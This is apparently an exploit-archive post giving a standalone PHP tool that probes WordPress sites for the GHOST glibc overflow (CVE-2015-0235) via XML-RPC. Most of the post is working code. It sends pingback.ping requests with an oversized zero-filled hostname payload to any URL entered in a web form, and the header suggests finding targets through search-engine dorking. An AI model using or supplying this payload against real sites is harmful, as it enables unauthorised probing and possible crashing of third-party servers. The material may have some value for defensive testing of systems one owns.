=============================================================================================================================================
| # Title     : WordPress 4.2.4 XMLRPC GHOST Vulnerability Scanner                                                                          |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/                                                                                                      |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Standalone PHP code to scan WordPress for GHOST vulnerability using XML-RPC.
   
   (linked: https://packetstorm.news/files/id/181060/ Linked CVE numbers: 	CVE-2015-0235),
	
[+] save code as poc.php.

[+] USage : http://127.0.0.1/poc.php 

[+] PayLoad :

<?php

class WordpressGhostScanner {
    private $target;
    private $length;

    public function __construct($target, $length = 2500) {
        $this->target = $target;
        $this->length = $length;
    }

    public function isWordpress() {
        $headers = @get_headers($this->target);
        if (!$headers) return false;
        foreach ($headers as $header) {
            if (stripos($header, 'X-Pingback') !== false) {
                return true;
            }
        }
        return false;
    }

    public function isXmlrpcEnabled() {
        $url = $this->target . "/xmlrpc.php";
        $response = @file_get_contents($url);
        return $response !== false && stripos($response, 'XML-RPC server accepts') !== false;
    }

    public function checkVulnerability() {
        if (!$this->isWordpress()) {
            return "هذا الموقع لا يستخدم ووردبريس.";
        }
        if (!$this->isXmlrpcEnabled()) {
            return "الواجهة XMLRPC غير مفعلة على هذا الموقع.";
        }

        $ghost = str_repeat("0", $this->length);
        $payload = "http://{$ghost}/test.php";
        $xml = "<?xml version='1.0'?><methodCall><methodName>pingback.ping</methodName><params><param><value>$payload</value></param><param><value>$payload</value></param></params></methodCall>";

        $context = stream_context_create([
            'http' => [
                'method' => 'POST',
                'header' => "Content-Type: text/xml\r\n",
                'content' => $xml
            ]
        ]);
        
        $response = @file_get_contents($this->target . '/xmlrpc.php', false, $context);
        if ($response === false || strpos($http_response_header[0], '500') !== false) {
            return "الموقع مستهدف بسبب ثغرة GHOST.";
        } else {
            return "الموقع غير معرض لثغرة GHOST.";
        }
    }
}

// واجهة المستخدم البسيطة
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $target = $_POST['target'];
    $scanner = new WordpressGhostScanner($target);
    $result = $scanner->checkVulnerability();
}
?>

<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <title>فحص ثغرة GHOST في ووردبريس</title>
</head>
<body>
    <h2>أداة فحص ثغرة GHOST في ووردبريس</h2>
    <form method="POST">
        <label>أدخل رابط الموقع:</label>
        <input type="text" name="target" required>
        <button type="submit">فحص</button>
    </form>
    <?php if (isset($result)): ?>
        <p><strong>النتيجة:</strong> <?php echo htmlspecialchars($result); ?></p>
    <?php endif; ?>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================